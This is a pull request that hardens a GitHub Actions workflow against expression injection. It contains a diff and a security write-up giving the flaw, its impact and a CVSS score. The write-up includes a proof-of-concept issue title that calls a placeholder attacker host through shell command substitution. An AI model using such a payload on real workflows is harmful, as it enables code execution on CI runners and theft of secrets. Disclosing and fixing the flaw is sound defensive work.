### PR TITLE
Refactor protocol-call workflow environment variables

### DIFF
--- a/.github/workflows/protocol-call-workflow.yml
+++ b/.github/workflows/protocol-call-workflow.yml
@@ -12,8 +12,10 @@ jobs:
     steps:
       - name: Check for protocol-call label
         id: check_label
+        env:
+          HAS_LABEL: ${{ contains(github.event.issue.labels.*.name, 'protocol-call') }}
         run: |
-          if [[ "${{ contains(github.event.issue.labels.*.name, 'protocol-call') }}" == "true" ]]; then
+          if [[ "$HAS_LABEL" == "true" ]]; then
             echo "has_protocol_label=true" >> $GITHUB_OUTPUT
             echo "✅ Issue has protocol-call label"
           else
@@ -205,10 +207,14 @@ jobs:
           pip list
 
       - name: Log protocol call processing
+        env:
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_LABELS: ${{ join(github.event.issue.labels.*.name, ', ') }}
         run: |
-          echo "Processing protocol call issue #${{ github.event.issue.number }}"
-          echo "Issue title: ${{ github.event.issue.title }}"
-          echo "Issue labels: ${{ github.event.issue.labels.*.name }}"
+          echo "Processing protocol call issue #$ISSUE_NUMBER"
+          echo "Issue title: $ISSUE_TITLE"
+          echo "Issue labels: $ISSUE_LABELS"
 
       - name: Handle protocol call
         run: |
@@ -242,6 +248,7 @@ jobs:
         if: always()
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
         run: |
           git config --local user.email "action@github.com"
           git config --local user.name "GitHub Action"
@@ -250,7 +257,7 @@ jobs:
             echo "No changes to mapping file"
           else
             git add .github/ACDbot/meeting_topic_mapping.json
-            git commit -m "Update mapping for issue ${{ github.event.issue.number }}"
+            git commit -m "Update mapping for issue $ISSUE_NUMBER"
             git push
             echo "Committed mapping file changes"
           fi


### PR DESCRIPTION
# Security Fix: GitHub Actions Expression Injection in protocol-call-workflow.yml

## Summary

The `protocol-call-workflow.yml` workflow contains a **GitHub Actions Expression Injection vulnerability (CWE-78: OS Command Injection)** that allows arbitrary command execution on the GitHub Actions runner through crafted issue titles.

## Vulnerability Details

**Affected file:** `.github/workflows/protocol-call-workflow.yml`

**Vulnerable code (line ~210, "Log protocol call processing" step):**

```yaml
- name: Log protocol call processing
  run: |
    echo "Processing protocol call issue #${{ github.event.issue.number }}"
    echo "Issue title: ${{ github.event.issue.title }}"
    echo "Issue labels: ${{ github.event.issue.labels.*.name }}"
```

The expression `${{ github.event.issue.title }}` is interpolated directly into the `run:` block **before** the shell interprets the script. GitHub Actions performs textual substitution of `${{ }}` expressions, meaning the value is inserted verbatim into the shell script. If the issue title contains shell metacharacters, arbitrary commands execute on the runner.

**Additional vulnerable code ("Commit mapping file" step):**

```yaml
git commit -m "Update mapping for issue ${{ github.event.issue.number }}"
```

While `issue.number` is an integer (lower risk), this pattern should also be hardened for defense in depth.

**Also in the "Check for protocol-call label" step:**

```yaml
if [[ "${{ contains(github.event.issue.labels.*.name, 'protocol-call') }}" == "true" ]]; then
```

This expression evaluates to a boolean string and is low risk, but has been moved to `env:` for consistency and defense in depth.

## Trigger Conditions

- **Event type:** `issues` (types: `opened`, `edited`)
- **Prerequisite:** The issue must have the `protocol-call` label AND the issue author must be a member of the `ethereum` or `ethcatherders` organization (or be in the trusted contributors list)
- **Note:** While the membership gate reduces external exploitability, an authorized contributor with a compromised account or a malicious insider could exploit this vulnerability

## Proof of Concept

An authorized user creates or edits an issue with the `protocol-call` label and the following title:

```
test$(curl https://attacker.example.com/$(whoami))
```

After GitHub expression substitution, the shell executes:

```bash
echo "Issue title: test$(curl https://attacker.example.com/$(whoami))"
```

The shell interprets `$()` as command substitution, executing `curl` and `whoami` on the runner.

## Impact

If exploited, the attacker gains command execution on the GitHub Actions runner with access to **all secrets configured in the workflow**, including:

- `ZOOM_CLIENT_ID`, `ZOOM_CLIENT_SECRET`, `ZOOM_ACCOUNT_ID`, `ZOOM_REFRESH_TOKEN`
- `DISCOURSE_API_KEY`, `DISCOURSE_API_USERNAME`
- `GCAL_SERVICE_ACCOUNT_KEY`, `GOOGLE_CLIENT_ID`, `GOOGLE_CLIENT_SECRET`
- `YOUTUBE_REFRESH_TOKEN`, `YOUTUBE_API_KEY`
- `GOOGLE_APPLICATION_CREDENTIALS`
- `TELEGRAM_BOT_TOKEN`
- `SENDER_EMAIL`, `SENDER_EMAIL_PASSWORD`, `SMTP_SERVER`
- `GITHUB_TOKEN` (with `contents: write` and `issues: write` permissions)

This could lead to:
- Exfiltration of all listed secrets
- Unauthorized access to Zoom, Google Calendar, YouTube, Telegram, Discourse, and email accounts
- Supply chain compromise via `contents: write` permission
- Unauthorized commits to the repository

## CVSS Score

**CVSS 3.1: 7.2 (High)** — `AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N`

- Attack Vector: Network (via GitHub issue)
- Attack Complexity: Low (trivial payload)
- Privileges Required: High (requires org membership / trusted contributor)
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High (secret exfiltration)
- Integrity: High (repository write access)
- Availability: None

## Fix Applied

All `${{ }}` expressions referencing attacker-controllable data have been moved from `run:` blocks to `env:` blocks. When values are assigned to environment variables first, the shell treats them as data rather than code, preventing injection.

**Before (vulnerable):**
```yaml
- name: Log protocol call processing
  run: |
    echo "Issue title: ${{ github.event.issue.title }}"
```

**After (fixed):**
```yaml
- name: Log protocol call processing
  env:
    ISSUE_TITLE: ${{ github.event.issue.title }}
  run: |
    echo "Issue title: $ISSUE_TITLE"
```

## References

- [GitHub Security Lab: Keeping your GitHub Actions and workflows secure](https://securitylab.github.com/resources/github-actions-untrusted-input)
- [GitHub Docs: Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
- [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html)